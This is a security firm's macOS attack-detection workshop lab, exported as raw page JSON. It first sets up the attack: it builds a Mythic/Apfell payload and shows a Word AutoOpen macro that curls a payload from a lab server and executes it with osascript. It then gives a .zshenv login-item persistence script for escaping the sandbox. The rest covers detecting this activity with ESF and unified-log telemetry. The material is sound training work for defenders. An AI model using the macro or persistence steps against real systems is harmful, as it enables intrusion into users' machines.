{"id":10501,"date":"2021-04-14T09:00:00","date_gmt":"2021-04-14T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/"},"modified":"2026-05-25T10:20:09","modified_gmt":"2026-05-25T09:20:09","slug":"attack-detection-fundamentals-2021-macos-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/","title":{"rendered":"Attack Detection Fundamentals 2021: macOS &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals 2021: macOS &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Endpoint Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Software Protection                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                14 avril, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Partager cette information                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20macOS%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: macOS &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_8deec2adbc7aaf4dfa3c6b658d5c1860\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Calum Hall<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Luke Roberts<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Navigation dans le contenu            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    S\u00e9lectionnez une section                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20macOS%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: macOS &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>Following on from the previous workshops we&#x27;ve delivered as part of WithSecure Consulting&#x27;s Attack Detection Fundamentals series, this workshop is going to delve into a topic far less discussed within the security world &#8211; detection on macOS.<\/p>\n<p>Over the three labs we have set out for this workshop, we&#x27;re aiming to develop an initial level of understanding for some of the attacks we see against macOS and most importantly how we can implement appropriate detections. The labs for this workshop are comprised of the following key areas:<\/p>\n<ul>\n<li>Initial access via Office Macros (inc. sandbox breakout)<\/li>\n<li>Persistence using LaunchAgents<\/li>\n<li>TCC bypass<\/li>\n<\/ul>\n<p>This workshop is not intended to cover all of the impressive macOS attacks we&#x27;ve seen in the wild, but rather to aid in developing macOS detection capability.<\/p>\n<p>A recording of this workshop series can be found <a href=\"https:\/\/www.youtube.com\/watch?v=A6rSlavcF4Q\" target=\"_blank\" rel=\"noopener\">here<\/a> and the slides are available <a href=\"https:\/\/www.f-secure.com\/content\/dam\/f-secure\/en\/consulting\/events\/collaterals\/digital\/f-secure_attack-detection-fundamentals-workshop-2-macos_2021-04-14.pdf\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>Before we begin this series, it is wise to acknowledge that throughout this workshop we have employed a lot of open source tools to gather the required telemetry. A number of these are not designed to be deployed at scale, but rather to simply demonstrate the telemetry that is available on macOS and that should be gathered by your EDR solution.<\/p>\n<p>So to kick things off let&#x27;s dive right into our first lab.<\/p>\n<h2>Environment Setup<\/h2>\n<p>The vectors used to achieve a foothold on macOS devices are no different from those of other major operating systems. Phishing is arguably the most effective means of gaining access to a device, with common payload types such as:<\/p>\n<ul>\n<li>Installation packages<\/li>\n<li>Mobile profile configurations (.profile files)<\/li>\n<li>Office macros<\/li>\n<\/ul>\n<p>During this workshop we will be utilising Cody Thomas&#x27;s (@its_a_feature_) Mythic post-exploitation framework. Formerly known as Apfell, Mythic has been developed by Cody Thomas and his colleagues at SpecterOps as an excellent red teaming framework that works cross platform. For the purpose of this workshop we will be solely using the framework&#x27;s Apfell payloads.<\/p>\n<p>Upon following the framework installation guidance provided (<a href=\"https:\/\/docs.mythic-c2.net\/\" target=\"_blank\" rel=\"noopener\">https:\/\/docs.mythic-c2.net<\/a>) we are going to begin creating target payloads. Within Mythic select the &#x27;Create Components&#x27; tab at the top of the screen and select &#x27;Create Payload&#x27;. Next select the macOS operating system and chose the HTTP (apfell, poseidon) payload type. For simplicity within this workshop we will keep the majority of payload values default, however it is important to change the &#x27;Callback Host&#x27; to the location of your Apfell server (assuming no redirectors are being used).<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Next we will select the apfell payload and provide a description that will be unique to this initial payload. For the purpose of this workshop we will select all commands to be included within the payload.<\/p>\n<p>Now that we are all set, let&#x27;s begin using this payload.<\/p>\n<h2>Generating an Office Macro<\/h2>\n<p>Now that we have generated an apfell payload we are going to generate a Microsoft Word document that contains a macro designed to download and execute a payload. Firstly, open Microsoft Word and create a new document, then select macros from the &#x27;Tools&#x27; dropdown menu:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>To generate the required macro you can use Cedric Owens&#x27; (@cedowens) Mythic Macro Generator tool (<a href=\"https:\/\/github.com\/cedowens\/Mythic-Macro-Generator\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/cedowens\/Mythic-Macro-Generator<\/a>), which generates a fairly simple Macro resembling the following:<\/p>\n<pre><code class=\"language-bash\">Sub AutoOpen()\nMacScript(&quot;do shell script &quot;&quot;curl http:\/\/192.168.54.4:8000\/apfell.js -o app.js&quot;&quot; &quot;)\nMacScript(&quot;do shell script &quot;&quot;chmod +x app.js&quot;&quot;&quot;)\nMacScript(&quot;do shell script &quot;&quot;osascript app.js &amp;&quot;&quot;&quot;)\nEnd Sub<\/code><\/pre>\n<p>Notice that this macro is downloading the apfell.js payload from a remote location. This is necessary for the apfell.js payload to execute properly. To host this payload remotely, you can use something like a Python web server using &#x27;python -m SimpleHTTPServer &lt;port number&gt;&#x27; whilst in a directory containing the payload.<\/p>\n<p>Once you are hosting the payload within an accessible location, add the macro to the word document like so:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-3.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Upon saving this document we are able to send off our first initial access payload.<\/p>\n<h2>Execution<\/h2>\n<p>Assuming we are able to coerce our target into opening the macro-enabled document and bypassing Microsoft&#x27;s security warnings, we can see that a new callback has been detected within Mythic:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-4.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>At this point we have gained an initial foothold and we can begin interacting with the compromised system. For example, listing the current directory (In our case, &quot;\/Users\/calumhall\/Library\/Containers\/com.microsoft.Word\/Data&quot;) we see our app.js payload:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-5.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>However, notice that attempting to perform simple tasks, such as creating a file within the \/tmp\/ directory, returns an &quot;Operation not permitted&quot; error:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-6.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>This behaviour is a result of Apple&#x27;s sandboxing capability (<a href=\"https:\/\/developer.apple.com\/documentation\/security\/app_sandbox\" target=\"_blank\" rel=\"noopener\">https:\/\/developer.apple.com\/documentation\/security\/app_sandbox<\/a>). This security control was introduced to the macOS ecosystem in an attempt to reduce the impact of a given application being compromised. As you might imagine, this situation is not ideal for an attacker, but makes life far easier for defenders!<\/p>\n<p>While the sandbox inevitably makes things harder for attackers, it does not remove the threat entirely, as there are still a number of paths that may be traversed. In this workshop we will utilise Apfell&#x27;s persist_loginitem_allusers functionality to gain persistence on the device. Login items have been exploited in the past by malware such as <a href=\"https:\/\/archive.f-secure.com\/weblog\/archives\/00002554.html\" target=\"_blank\" rel=\"noopener\">OSX.KitM<\/a> that was designed to take periodic screenshots of compromised devices.<\/p>\n<p>For the purpose of this workshop, we will assume users are running the latest version of macOS, and hence we know that the default shell is zsh. We can use this knowledge to create a login item that distributes a zsh environment profile that will call the &quot;app.js&quot; payload that our malicious macro dropped into the below location:<\/p>\n<ul>\n<li>\/Users\/calumhall\/Library\/Containers\/com.microsoft.Word\/Data\/app.js<\/li>\n<\/ul>\n<p>Firstly let&#x27;s create the .zshenv file on our Mythic server, the contents should include the following where &lt;current user&gt; is the user account we have compromised:<\/p>\n<pre><code class=\"language-bash\">echo \u201czsh profile error report\u201d &gt; \/tmp\/~\\\\$zshprofileerror.txt\nnohup \/usr\/bin\/osascript \/Users\/&lt;current user&gt;\/Library\/Containers\/com.microsoft.Word\/Data\/app.js &amp;<\/code><\/pre>\n<p>We must then compress this environment into a zip file:<\/p>\n<ul>\n<li>zip -r zshenv.zip .zshenv<\/li>\n<\/ul>\n<p>A zip file is used, as the macOS device will use its default file-handling functionality to unpack the &quot;.zshenv&quot; file once dropped to disk. We will now use Mythic&#x27;s upload functionality to upload this zip file to the target device:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-7.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Notice that the remote_path variable has been prepended with &quot;~$&quot; &#8211; this is necessary to be able to write files from within the sandboxed environment. We can now trigger the persist_loginitem_allusers function within Mythic:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-8.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Given these commands have worked you will see the following output:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-9.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>We can verify this login item has been created on the device by visiting System Preferences \u2192 Users &amp; Groups:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-10.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Where you can see the file &quot;loginitem_persist&quot; has been set as a login item.<\/p>\n<p>As we can see on the Mythic server, when the target user logs into their account a new session is returned from target device:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-11.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Most importantly this session is no longer contained within the macOS sandbox, and hence we are far less limited in our capability:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-12.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>Detection<\/h2>\n<p>For the purpose of detecting these attacks, we are largely going to be relying on two core Apple logging functions: the Unified Log and the Endpoint Security Framework (ESF). Throughout the attack outlined above, there are numerous opportunities for detection, given that this initial lab is focussing on we are going to discuss identifying the following stages:<\/p>\n<ul>\n<li>Malicious process trees<\/li>\n<li>Sandbox breakout attempts<\/li>\n<\/ul>\n<h3>Malicious Process Trees<\/h3>\n<p>To monitor process activity within macOS we can utilise the ESF to gain information about new processes events. Using a tool such as Objective-See&#x27;s <a href=\"https:\/\/objective-see.com\/products\/utilities.html#ProcessMonitor\" target=\"_blank\" rel=\"noopener\">ProcessMonitor<\/a> we can investigate the process activity that takes place when our malicious document is opened:<\/p>\n<pre><code class=\"language-bash\">&gt; sudo .\/ProcessMonitor.app\/Contents\/MacOS\/ProcessMonitor -pretty\n\n[...redacted...]\n{\n&quot;event&quot;: &quot;ES_EVENT_TYPE_NOTIFY_FORK&quot;,\n&quot;process&quot;: {\n&quot;signing info (computed)&quot;: {\n&quot;teamID&quot;: &quot;UBF8T346G9&quot;,\n&quot;signatureID&quot;: &quot;com.microsoft.Word&quot;,\n&quot;signatureStatus&quot;: 0,\n&quot;signatureSigner&quot;: &quot;App Store&quot;,\n&quot;signatureAuthorities&quot;: [\n&quot;Apple Mac OS Application Signing&quot;,\n&quot;Apple Worldwide Developer Relations Certification Authority&quot;,\n&quot;Apple Root CA&quot;\n]\n},\n&quot;uid&quot;: 501,\n&quot;arguments&quot;: [],\n&quot;ppid&quot;: 16455,\n&quot;ancestors&quot;: [\n16455,\n1\n],\n&quot;rpid&quot;: 16455,\n&quot;architecture&quot;: &quot;unknown&quot;,\n&quot;path&quot;: &quot;\/Applications\/Microsoft Word.app\/Contents\/MacOS\/Microsoft Word&quot;,\n&quot;signing info (reported)&quot;: {\n&quot;teamID&quot;: &quot;UBF8T346G9&quot;,\n&quot;csFlags&quot;: 570508033,\n&quot;signingID&quot;: &quot;com.microsoft.Word&quot;,\n&quot;platformBinary&quot;: 0,\n&quot;cdHash&quot;: &quot;A9DD8BB4E781CD181E47F446E7092BC28C534626&quot;\n},\n&quot;name&quot;: &quot;Microsoft Word&quot;,\n&quot;pid&quot;: 16463\n},\n&quot;timestamp&quot;: &quot;2021-04-09 10:10:31 +0000&quot;\n}<\/code><\/pre>\n<p>The ESF generates an event revealing that Microsoft Word has forked another process, something that does not resemble legitimate application behaviour. This is the key area of detection that we are going to focus on for the purpose of this workshop. However, should we wish to gather more information we can see the full chain of events that occur due to our Office macro from ESF events, such as the execution of our malicious payload:<\/p>\n<pre><code class=\"language-bash\">&gt; sudo .\/ProcessMonitor.app\/Contents\/MacOS\/ProcessMonitor -pretty\n\n[...redacted...]\n{\n&quot;event&quot;: &quot;ES_EVENT_TYPE_NOTIFY_EXEC&quot;,\n&quot;process&quot;: {\n&quot;signing info (computed)&quot;: {\n&quot;signatureID&quot;: &quot;com.apple.sh&quot;,\n&quot;signatureStatus&quot;: 0,\n&quot;signatureSigner&quot;: &quot;Apple&quot;,\n&quot;signatureAuthorities&quot;: [\n&quot;Software Signing&quot;,\n&quot;Apple Code Signing Certification Authority&quot;,\n&quot;Apple Root CA&quot;\n]\n},\n&quot;uid&quot;: 501,\n&quot;arguments&quot;: [\n&quot;sh&quot;,\n&quot;-c&quot;,\n&quot;osascript app.js &amp;&quot;\n],\n&quot;ppid&quot;: 16455,\n&quot;ancestors&quot;: [\n16455,\n1\n],\n&quot;rpid&quot;: 16455,\n&quot;architecture&quot;: &quot;unknown&quot;,\n&quot;path&quot;: &quot;\/bin\/sh&quot;,\n&quot;signing info (reported)&quot;: {\n&quot;teamID&quot;: &quot;&quot;,\n&quot;csFlags&quot;: 570522385,\n&quot;signingID&quot;: &quot;com.apple.sh&quot;,\n&quot;platformBinary&quot;: 1,\n&quot;cdHash&quot;: &quot;66A2F84953DF3125477BD8498E6767F0F9BCCCE1&quot;\n},\n&quot;name&quot;: &quot;sh&quot;,\n&quot;pid&quot;: 16463\n},\n&quot;timestamp&quot;: &quot;2021-04-09 10:10:38 +0000&quot;\n}<\/code><\/pre>\n<p>For detecting malicious process trees we&#x27;d definitely recommend checking out Jaron Bradley&#x27;s tool &#8211; <a href=\"https:\/\/themittenmac.com\/tools\/\" target=\"_blank\" rel=\"noopener\">TrueTree<\/a>. This has recently been adapted for Big Sur and now provides some awesome visibility into macOS process trees. For example, with our Apfell payload active, we can observe the osascript process that has spawned from Microsoft Word:<\/p>\n<pre><code class=\"language-bash\">&gt; sudo .\/TrueTree-3\n\n[...redacted...]\n\/System\/Library\/LaunchAgents\/com.apple.Finder.plist\n\/System\/Library\/CoreServices\/Finder.app\/Contents\/MacOS\/Finder 408\n\/Applications\/Microsoft Word.app\/Contents\/MacOS\/Microsoft Word 16455\n\/usr\/bin\/osascript 16464<\/code><\/pre>\n<p>Using the ESF we are able to detect the malicious process activity as we have discussed above. Whilst this workshop has used Objective-See&#x27;s ProcessMonitor to demonstrate this, any EDR solution that utilises the ESF should be able to gather the same telemetry.<\/p>\n<h3>Sandbox Breakout Attempt<\/h3>\n<p>While potentially difficult to utilise, the unified log contains a wealth of information regarding activity on macOS devices. Here we can see that the unified log has identified a failed event that has been denied due to Apple&#x27;s sandbox, i.e. our &quot;touch \/tmp\/test&quot; command.<\/p>\n<pre><code class=\"language-bash\">\u276f log stream --predicate &#x27;senderImagePath contains &quot;Sandbox&quot; &amp;&amp; eventMessage contains &quot;deny&quot; &amp;&amp; messageType == 16&#x27;\n\nFiltering the log data using &quot;senderImagePath CONTAINS &quot;Sandbox&quot; AND composedMessage CONTAINS &quot;deny&quot; AND logType == 16&quot;\nTimestamp Thread Type Activity PID TTL\n2021-03-08 20:36:54.692747+0000 0x4fa7e0 Error 0x0 0 0 kernel: (Sandbox) Sandbox: touch(67670) deny(1) file-write-create \/private\/t<\/code><\/pre>\n<p>Whilst this telemetry can be incredibly valuable, it should be noted that this series of predicates are likely to produce some noise from legitimate Apple components. As such is may be required that further predicates are implemented to reduce this noise. For those that haven&#x27;t worked with them before, predicates are a term given to certain conditions you can enforce to filter through the large quantities of events held within the Unified Logs.<\/p>\n<h2>Conclusion<\/h2>\n<p>To summarise, from the offensive perspective it&#x27;s refreshing (or perhaps concerning) to see that Office Macros are still an issue even on Apple devices. We have demonstrated that whilst a hurdle, the Apple sandbox does not impose too much of a challenge for offensive operators, and that it should not be assumed a security control in this instance.<\/p>\n<p>More importantly however, we&#x27;ve revealed that attacks of this nature can be detected with a reasonable degree of confidence! With the telemetry gathered by the ESF, not only can we detect the initial events that arouse suspicion, but we can also delve further into analysing the behaviour of the malicious payload. It is entirely reasonable to develop these detections further by looking for behaviour such as alerting on certain osascript usage, however it is important to avoid alert fatigue depending on the behaviour of your legitimate users.<\/p>\n<h3>References<\/h3>\n<p>Special shoutout to the following researchers whose work has formed the basis of this workshop series:<\/p>\n<ul>\n<li>Patrick Wardle<\/li>\n<li>Cody Thomas<\/li>\n<li>Michael Jack<\/li>\n<li>Cedric Owens<\/li>\n<li>Csaba Fitzl<\/li>\n<li>Jaron Bradley<\/li>\n<li>Guillaume Ross<\/li>\n<li>Howard Oakley<\/li>\n<li>Phil Stokes<\/li>\n<li>Madhav Bhatt<\/li>\n<li>Adam Chester<\/li>\n<\/ul>\n<p>And to anyone else that we have inevitably forgotten to mention.<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20macOS%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: macOS &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content 